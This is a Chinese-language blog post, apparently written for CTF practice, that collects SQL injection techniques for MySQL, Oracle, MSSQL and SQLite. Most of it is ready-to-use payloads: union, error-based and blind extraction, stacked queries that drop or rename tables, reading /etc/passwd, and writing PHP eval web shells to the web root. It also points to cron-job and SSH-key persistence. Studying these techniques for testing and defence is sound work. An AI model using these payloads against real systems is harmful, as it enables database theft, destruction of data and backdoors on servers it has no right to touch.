<!DOCTYPE html>
<html lang="">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://s2.ax1x.com/2019/10/30/K5JmBF.png">
  <link rel="icon" type="image/png" href="https://s2.ax1x.com/2019/10/30/K5JenU.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="Lethe&#39;s Blog">
  <meta name="author" content="Lethe">
  <meta name="keywords" content="Lethe&#39;s Blog">
  <title>SQL注入总结 ~ Lethe&#39;s Blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.10.2/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.8.9/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>Lethe's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">ホーム</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">アーカイブ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">カテゴリー</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">タグ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">本ブログ情報　</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background"
         style="background: url('https://s2.ax1x.com/2019/10/30/K5Jp7Q.jpg')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              
                <p class="mt-3">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>&nbsp;
                  Tuesday, July 16th 2019, 4:36 pm
                </p>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    3k 字
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      13 分钟
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>&nbsp;
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <p>自己的总结加上搜集网上各路大牛的方法，应该还算比较全了。<br><a href="http://p0desta.com/" target="_blank" rel="noopener">p0desta‘s Blog</a><br><br></p>
<h2><span id="一-基本知识">一、基本知识</span></h2><h3><span id="1-常用函数">1、常用函数</span></h3><h6><span id="1查看当前数据库版本">（1）查看当前数据库版本</span></h6><ul>
<li>version()</li>
<li>@@version</li>
<li>@@global.version</li>
</ul>
<h6><span id="2查看当前登陆用户">（2）查看当前登陆用户</span></h6><ul>
<li>user()</li>
<li>current_user()</li>
<li>system_user()</li>
<li>session_user()</li>
</ul>
<h6><span id="3当前使用的数据库">（3）当前使用的数据库</span></h6><ul>
<li>database()</li>
<li>schema()</li>
</ul>
<h6><span id="4路径查询">（4）路径查询</span></h6><ul>
<li>@@basedir ——mysql安装路径 </li>
<li>@@slave_load_tampdir ——临时文件夹路径</li>
<li>@@datadir ——数据存储路径</li>
<li>@@character_sets_dir ——字符集设置文件路径</li>
<li>@@log_error ——错误日志文件路径</li>
<li>@@pid_file ——pid-file文件路径</li>
</ul>
<h6><span id="5字符串连接函数">（5）字符串连接函数</span></h6><ul>
<li>group_concat() ——返回一个字符串结果，该结果由分组中的值连接组合而成。<code>group_concat([DISTINCT] 要连接的字段[Order BY ASC/DESC 排序字段] [Separator &#39;分隔符&#39;])</code></li>
<li>concat() ——将多个字符串连接成一个字符串，<code>CONCAT(str1,str2,…)</code></li>
<li>concat_ws() ——有分隔符的字符串连接,<code>CONCAT_WS(separator,str1,str2,…)</code></li>
</ul>
<h6><span id="6盲注常用函数">（6）盲注常用函数</span></h6><ul>
<li>length(str) ——返回字符串str的长度</li>
<li>mid(str, start [,length]) ——从字符串str的start(从1开始)位置开始返回长的为length的部分</li>
<li>substr(str, start [,length]) ——从字符串str的start(从1开始)位置开始返回长的为length的部分</li>
<li>left(str, length) ——返回具有指定长度的字符串的左边部分</li>
<li>ord()  ——返回字符串第一个字符的 ASCII 值</li>
<li>ascii() ——返回字符串第一个字符的 ASCII 值</li>
</ul>
<h6><span id="7time-based常用函数">（7）Time-Based常用函数</span></h6><ul>
<li>BENCHMARK(count,expr)   ——重复count次执行表达式expr</li>
<li>sleep(n) ——暂停数据库n秒</li>
<li>if(expr1,expr2,expr3) ——如果expr1的值为true，则返回expr2的值，如果expr1的值为false，则返回expr3的值</li>
</ul>
<h6><span id="8wrong-based常用函数">（8）Wrong-Based常用函数</span></h6><ul>
<li>rand(int) ——以int为种子生成伪随机数</li>
<li>floor() ——返回小于等于该值的最大整数</li>
<li>count() ——统计个数</li>
<li>updatexml()</li>
</ul>
<blockquote>
<p><strong>updatexml()函数</strong><br><br>UPDATEXML (XML_document, XPath_string, new_value);<br>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc<br> 第二个参数：XPath_string(Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。<br>第三个参数：new_value，String格式，替换查找到的符合条件的数据  <br><br> <strong>作用</strong>： 改变文档中符合条件的节点的值<br>改变XML_document中符合XPATH_string的值</p>
</blockquote>
<p>例如，<code>updatexml(1,concat(&#39;~&#39;,(select database()),&#39;~&#39;),3);</code><br>由于<code>updatexml()</code>的第二个参数需要Xpath格式的字符串，以<code>~</code>开头的内容不是xml格式的语法，其中的<code>concat()</code>函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，会将括号内的执行结果以错误的形式报出，这样就可以实现报错注入了。</p>
<h6><span id="9其他函数">（9）其他函数</span></h6><ul>
<li>bin() ——返回值的二进制表示</li>
<li>conv(str,m,n) ——进制转换，将str从m进制转换为n进制</li>
<li>lower() ——转成小写字母</li>
<li>upper() ——转成大写字母</li>
<li>hex() ——十六进制编码</li>
<li>unhex() ——十六进制解码</li>
</ul>
<p><br></p>
<h3><span id="2-常用语句及方法">2、常用语句及方法</span></h3><h5><span id="1mysql常用语句">（1）Mysql常用语句</span></h5><h6><span id="所有用户">所有用户：</span></h6><pre><code>  select group_concat(user) from mysql.user
</code></pre><h6><span id="用户hash">用户hash：</span></h6><pre><code>select group_concat(password) from mysql.user where user=&#39;root&#39;
</code></pre><h6><span id="所有数据库">所有数据库：</span></h6><pre><code>SELECT group_concat(schema_name) from information_schema.schemata
</code></pre><h6><span id="表名">表名：</span></h6><pre><code>SELECT group_concat(table_name) from information_schema.tables where table_schema=&#39;库名&#39;
</code></pre><h6><span id="表中有主码约束非空约束等完整性约束条件的才能用这个语句查询出">//表中有主码约束，非空约束等完整性约束条件的才能用这个语句查询出</span></h6><pre><code>SELECT group_concat(table_name) from information_schema.table_constraints where table_schema=&#39;库名&#39;
</code></pre><h6><span id="字段名">字段名：</span></h6><pre><code>SELECT group_concat(column_name) from information_schema.columns where table_name=&#39;表名&#39;
</code></pre><h6><span id="读文件">读文件：</span></h6><pre><code>SELECT load_file(&#39;/etc/passwd&#39;)
</code></pre><h6><span id="写文件">写文件：</span></h6><pre><code>SELECT &#39;&lt;?php @eval($_POST[1]);?&gt;&#39; into outfile &#39;/var/www/html/shell.php&#39;
</code></pre><p><br></p>
<h5><span id="2union注入">（2）UNION注入</span></h5><h6><span id="判断列数">判断列数</span></h6><pre><code>id=1&#39; order by 1 %23
id=1&#39; order by 2 %23
id=1&#39; order by 3 %23
·····
id=1&#39; order by n %23

直到报错为止，最后一个页面正确回显的数，即为列数
</code></pre><h6><span id="判断回显位置">判断回显位置</span></h6><pre><code> id=-1&#39; UNION SELECT 1,2 %23
</code></pre><p>然后在可回显的位置处构造SQL语句进行注入<br><br></p>
<h5><span id="2报错注入">（2）报错注入</span></h5><h6><span id="floor">floor</span></h6><pre><code>?id=1 OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
</code></pre><h6><span id="extractvalue有长度限制最长32位">ExtractValue(有长度限制,最长32位)</span></h6><pre><code>?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
</code></pre><h6><span id="updatexml有长度限制最长32位">UpdateXml(有长度限制,最长32位)</span></h6><pre><code>?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
</code></pre><h6><span id="error-based-double-query-injection">Error based Double Query Injection</span></h6><pre><code>?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
</code></pre><h6><span id="exp555以上">exp(5.5.5以上)</span></h6><pre><code>id=1 and (select exp(~(select * from(select user())x)))
</code></pre><h6><span id="polygon">polygon</span></h6><pre><code>mysql&gt; select * from users where username=&quot;&quot;and polygon (password);
ERROR 1367 (22007): Illegal non geometric &#39;`security`.`users`.`password`&#39; value found during parsing
</code></pre><p><br></p>
<h5><span id="3bool盲注">（3）bool盲注</span></h5><p>对于盲注，常常需要写脚本来进行注入<br>可参考：<a href="https://lethe.site/2019/03/02/%E4%BB%A5dvwa%E4%B8%BA%E4%BE%8B%E5%AD%A6%E4%B9%A0%E7%AE%80%E5%8D%95sql%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E7%9A%84%E8%AF%A6%E7%BB%86%E8%84%9A%E6%9C%AC/">以dvwa为例简单bool盲注脚本</a><br>payload：</p>
<pre><code>// i 用于提取每一个位，j 用于判断其对应的ASCII码值的范围。
// k ，结合limit，选择偏移为k的行
// **中可以填上其他的select语句，比如查询表名，列名，数据。一次类推。
// SUBSTR() 也可以换成 SUBSTRING()

&#39; OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) &lt; j) #

&#39; OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) &lt; j) #  

&#39; OR (SELECT SUBSTR(DATABASE(),i,1) &lt; j) #

&#39; OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) &lt; j) #  

&#39; OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) &lt; j #
</code></pre><p><br></p>
<h5><span id="4时间盲注">（4）时间盲注</span></h5><h6><span id="检测方法">检测方法</span></h6><pre><code>1 OR SLEEP(25)=0 LIMIT 1 #
1) OR SLEEP(25)=0 LIMIT 1 #
1&#39; OR SLEEP(25)=0 LIMIT 1 #
&#39;) OR SLEEP(25)=0 LIMIT 1 #
1)) OR SLEEP(25)=0 LIMIT 1 #
SELECT SLEEP(25) #
</code></pre><h6><span id="payload">payload</span></h6><pre><code>UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) &lt; j,BENCHMARK(100000,SHA1(1)),0)

UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) &lt; j,SLEEP(10),0)
</code></pre><p><br></p>
<h5><span id="5insert-update注入">（5）Insert / Update注入</span></h5><p>insert和update一般使用报错注入，如果没有错误回显，insert可以使用延时注入，update可以使用bool盲注和延时盲注。</p>
<p>如果存在<code>insert</code>或者<code>update</code>，更新后的数据是可见的话,那么利用mysql的隐式类型转换，其实就是当字符串与整数相加时，会当作整数来解释，如下：<br><img src="/2019/07/16/SQL注入总结/1.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p>那么我们可以利用查询的数据转化为<strong>10进制</strong>,然后进行运算,拿到我们计算的结果,在进行转化回去即可。<br>（可参考RCTF 2015 upload一题）</p>
<pre><code class="mysql">mysql&gt; update users set password=&#39;&#39;+conv(hex(substr(user(),1 + (1-1) * 8, 6)), 16, 10);
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
mysql&gt; select * from users;
+----+----------+-----------------+
| id | username | password        |
+----+----------+-----------------+
|  1 | admin    | 125822936825964 |
+----+----------+-----------------+
1 row in set (0.00 sec)
mysql&gt; select unhex(conv(125822936825964, 10 ,16));
+--------------------------------------+
| unhex(conv(125822936825964, 10 ,16)) |
+--------------------------------------+
| root@l                               |
+--------------------------------------+
1 row in set (0.00 sec)
</code></pre>
<p><br></p>
<h5><span id="6表名可控注入">（6）表名可控注入</span></h5><h6><span id="表名不完全可控且desc的表名含有identifier-quoteselect的表名不含identifier-quote">表名不完全可控且DESC的表名含有identifier quote,SELECT的表名不含identifier quote</span></h6><pre><code class="php">mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);
mysql_query(&quot;use b2cshop&quot;);
$table = $_GET[&#39;table&#39;];
mysql_query(&quot;desc `shop_{$table}`&quot;) or die(&quot;DESC 出错:&quot;.mysql_error());
$sql = &quot;select * from shop_{$table} where 1=1&quot;;
echo $sql;
echo &quot;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&quot;;
var_dump(mysql_fetch_array(mysql_query(&quot;$sql&quot;)));
echo mysql_error();
</code></pre>
<p><img src="/2019/07/16/SQL注入总结/2.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>shop_users 后面的两个<code></code>,做了shop_users 表的别名,所以无影响。<br>这时候desc的语句为,</p>
<pre><code>desc `shop_users` `where updatexml(1,concat(0x5e24,(select user()),0x5e24),1)#`
</code></pre><h6><span id="表名不完全可控且desc的表名不含identifier-quoteselect的表名含有identifier-quote">表名不完全可控且DESC的表名不含identifier quote,SELECT的表名含有identifier quote</span></h6><pre><code class="php">mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;root&quot;);
mysql_query(&quot;use b2cshop&quot;);
$table = $_GET[&#39;table&#39;];
mysql_query(&quot;desc shop_{$table}&quot;) or die(&quot;DESC 出错:&quot;.mysql_error());
$sql = &quot;select * from `shop_{$table}` where 1=1&quot;;
echo $sql;
echo &quot;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&quot;;
var_dump(mysql_fetch_array(mysql_query(&quot;$sql&quot;)));
echo mysql_error();
</code></pre>
<p><img src="/2019/07/16/SQL注入总结/3.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><br></p>
<h5><span id="7无列名注入">（7）无列名注入</span></h5><h6><span id="别名">别名</span></h6><pre><code>union (select 1,2,c from (select 1,2 c union select * from flag)b) limit 1,1
</code></pre><p><img src="/2019/07/16/SQL注入总结/4.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>或者</p>
<pre><code>union (select 1,2,c from (select 1,2 as c union select * from flag) as b) limit 1,1
</code></pre><p><img src="/2019/07/16/SQL注入总结/5.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h6><span id="绕过逗号">绕过逗号</span></h6><pre><code>select c from (select * from (select 1 `a`)m join (select 0 `i`)o join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from flag)x;
</code></pre><p><br></p>
<h5><span id="8可报错时爆表名-字段名-库名">（8）可报错时爆表名、字段名、库名</span></h5><h6><span id="字段名">字段名</span></h6><p>上文介绍可以使用无列明注入，但是如果再进行限制,不允许使用union 该怎么破呢？</p>
<pre><code>select * from admin where id=1 and (select * from (select * from admin as a join admin as b) as c)
</code></pre><p><img src="/2019/07/16/SQL注入总结/6.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>把当前表第一个字段成功爆出来了。</p>
<p>这个的原理就是在使用别名的时候，表中不能出现相同的字段名，于是我们就利用join把表扩充成两份，在最后别名c的时候 查询到重复字段，就成功报错。</p>
<p>同时，可以利用using爆其他字段：<br><img src="/2019/07/16/SQL注入总结/7.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h6><span id="表名">表名</span></h6><p>翻阅mysql的文档发现了一个非常好玩的函数</p>
<p>Polygon(ls1, ls2, …)</p>
<p>Polygon从多个LineString或WKB LineString参数 构造一个值 。如果任何参数不表示LinearRing（也就是说，不是一个封闭和简单的LineString），返回值就是NULL</p>
<p>如果传参不是linestring的话，就会爆错，而当如果我们传入的是存在的字段的话，就会爆出已知库、表、列。<br><img src="/2019/07/16/SQL注入总结/8.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMTgxNDI4,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h6><span id="库名">库名</span></h6><p>上面的方法已经可以爆出库名了，提供另一个方法</p>
<pre><code>select * from admin where id =1-a()
</code></pre><p><br></p>
<h5><span id="9堆叠注入">（9）堆叠注入</span></h5><h6><span id="新建一个表">新建一个表</span></h6><pre><code>select * from users where id=1;create table test like users;
</code></pre><h6><span id="删除上面新建的test表">删除上面新建的test表</span></h6><pre><code>select * from users where id=1;drop table test;
</code></pre><h6><span id="查询数据">查询数据</span></h6><pre><code>select * from users where id=1;select 1,2,3;
</code></pre><h6><span id="加载文件">加载文件</span></h6><pre><code>select * from users where id=1;select load_file(&#39;c:/tmpupbbn.php&#39;);
</code></pre><h6><span id="修改数据">修改数据</span></h6><pre><code>select * from users where id=1;insert into users(id,username,password)
values(&#39;100&#39;,&#39;new&#39;,&#39;new&#39;);
</code></pre><h6><span id="找一处可查询处利用修改表名来拿数据">找一处可查询处,利用修改表名来拿数据</span></h6><pre><code>&#39;;rename table `words` to `xxxx`;rename table `1919810931114514` to `words`;alter table `words` add id int primary key auto_increment;%23
</code></pre><p><br></p>
<h2><span id="三-其他数据库">三、其他数据库</span></h2><h3><span id="1oracle">1.Oracle</span></h3><h6><span id="注释符">注释符：</span></h6><pre><code>-- +
</code></pre><h6><span id="当前用户权限">当前用户权限：</span></h6><pre><code>select * from session_roles
</code></pre><h6><span id="当前数据库版本">当前数据库版本：</span></h6><pre><code>select banner from sys.v_$version where rownum=1
</code></pre><h6><span id="服务器监听ip">服务器监听IP：</span></h6><pre><code>select utl_inaddr.get_host_address from dual
</code></pre><h6><span id="服务器操作系统">服务器操作系统：</span></h6><pre><code>select member from v$logfile where rownum=1
</code></pre><h6><span id="服务器sid">服务器sid：</span></h6><pre><code>select instance_name fromv$instance
</code></pre><h6><span id="当前连接用户">当前连接用户：</span></h6><pre><code>select SYS_CONTEXT (&#39;USERENV&#39;, &#39;CURRENT_USER&#39;)from dual
</code></pre><h6><span id="获取数据库名">获取数据库名：</span></h6><pre><code>select owner from all_tables where rownum=1
依次爆出所有数据库名，假设第一个库名为first_dbname哪个第二个库select owner from all_tables where rownum=1 and owner&lt;&gt;&#39;first_dbname&#39;依次类推
</code></pre><h6><span id="获取表名">获取表名：</span></h6><pre><code>select table_name from user_tables where rownum=1，依次爆出所有表类似暴库。
</code></pre><h6><span id="获取字段名">获取字段名：</span></h6><pre><code>select column_name from user_tab_columns where table_name=&#39;tablename&#39; and rownum=1，
</code></pre><p><br></p>
<h3><span id="2mssql">2.MSSQL</span></h3><h6><span id="数据库版本">数据库版本：</span></h6><p><code>select @@VERSION</code></p>
<h6><span id="数据库名">数据库名：</span></h6><p><code>select db_name()</code></p>
<h6><span id="数据库ip地址">数据库ip地址：</span></h6><p><code>select local_net_address from sys.dm_exec_connextions where Session_id=@@spid</code></p>
<h6><span id="暴当前表中的列">暴当前表中的列：</span></h6><p><code>article.asp?id=6 group by admin.username having 1=1--</code></p>
<p><code>article.asp?id=6 group by admin.username,admin.password having 1=1--</code></p>
<h6><span id="暴任意表和列">暴任意表和列：</span></h6><p><code>and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)&gt;1</code></p>
<p><code>and (select top col_name(object_id(&#39;admin&#39;),N) from sysobjects)&gt;1</code></p>
<h6><span id="暴数据库数据">暴数据库数据：</span></h6><p><code>and (select top 1 password from admin where id=N)&gt;1</code></p>
<p><br></p>
<h3><span id="3sqlite">3.SQLite</span></h3><h5><span id="1常用信息及语句">（1）常用信息及语句</span></h5><p>数据库版本：<br><code>select sqlite_version()</code></p>
<p>获取所有表名：<br><code>SELECT name FROM sqlite_master WHERE type=&#39;table&#39;</code></p>
<p>所有表结构(包含字段名，表名)：<br><code>SELECT sql FROM sqlite_master WHERE type=&#39;table&#39;</code></p>
<p>注释符<br><code>--</code></p>
<p>盲注常用函数：<code>substr()（没有mid、left等函数），判断长度函数length()</code></p>
<h5><span id="2bool盲注">（2）BOOL盲注</span></h5><p>bool条件构造和MySQL一样，但是亦或运算的Payload不可用，注释符使用–。</p>
<p>逻辑判断目前我就翻到一个substr()，应用实例：<br><code>cond=&#39;FALSE&#39; or (substr(&#39;abc&#39;,1,1)=&#39;a&#39;)</code></p>
<h5><span id="3延时盲注">（3）延时盲注</span></h5><p>sqlite没有类似sleep()的函数，但有个函数randomblob(N)，生成N个任意字符，可以造成延时。</p>
<p>SQLite没有if，可以使用case when … then …</p>
<p>格式<code>cond=&#39;true&#39; AND 1=(case when (bool) then randomblob(100000000) else 0 end)</code><br>100000000个字符就有明显延时了。</p>
<p>注意cond为真，并且不要有太多条数据，因为有一条数据就会执行一次<code>randomblob(100000000)</code>，如果数据很多的话，服务器直接挂了。可以首先判断一下数据量，再确定N的值，比如我这里有100多条数据，就可以<code>id=&#39;&#39; or 1 AND 1=randomblob(1000000)</code>这样，把N的值缩小100倍。灵活运用。</p>
<p>运用实例：</p>
<pre><code>&#39; or 1 and 1=(case when substr(&#39;abc&#39;,1,1)=&#39;a&#39; then randomblob(1000000) else 0 end)--
</code></pre><h5><span id="4写文件">（4）写文件</span></h5><p>需要直接访问数据库，或堆叠查询选项启用（默认关闭）</p>
<pre><code>&#39;;ATTACH DATABASE &#39;/tmp/p0.php&#39; AS p0;CREATE TABLE p0.shell (data text);INSERT INTO p0.shell (data) VALUES (&#39;&lt;?php eval($_POST[1]);?&gt;&#39;);--
</code></pre><p>root权限的话可以写计划任务和公钥，参考redis未授权访问利用。</p>
<h5><span id="5读文件">（5）读文件</span></h5><p>只能用在Windows上，需要特殊配置。</p>
<pre><code>load_extension(library_file,entry_point)
</code></pre>
            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/CTF">CTF</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/CTF">CTF</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;ディレクトリ</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>
      var disqus_config = function () {
        this.page.url = 'https://lethe.site/2019/07/16/SQL注入总结/';
        this.page.identifier = '/2019/07/16/SQL注入总结/';
      };
      var oldLoad = window.onload;
      window.onload = function () {
        var d = document, s = d.createElement('script');
        s.type = 'text/javascript';
        s.src = '//' + 'Lethe' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
      };
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow noopener">comments
        powered by Disqus.</a></noscript>
  </div>


    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">検索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">キーワード</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv">总访问量 
          <span id="busuanzi_value_site_pv"></span> 次</span>&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv">总访客数 
            <span id="busuanzi_value_site_uv"></span> 人</span>&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.15.0/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.8.9/js/mdb.min.js"></script>
<script src="/js/main.js"></script>


  <script src="/js/lazyload.js"></script>



  
    <script src="https://cdn.staticfile.org/tocbot/4.8.0/tocbot.min.js"></script>
  
  <script src="/js/post.js"></script>



  <script src="https://cdn.staticfile.org/smooth-scroll/16.1.0/smooth-scroll.min.js"></script>



  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


<!-- Plugins -->


  
    <!-- Baidu Analytics -->
    <script>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?99792b18d5c4379d7bc5cf4bced8a563";
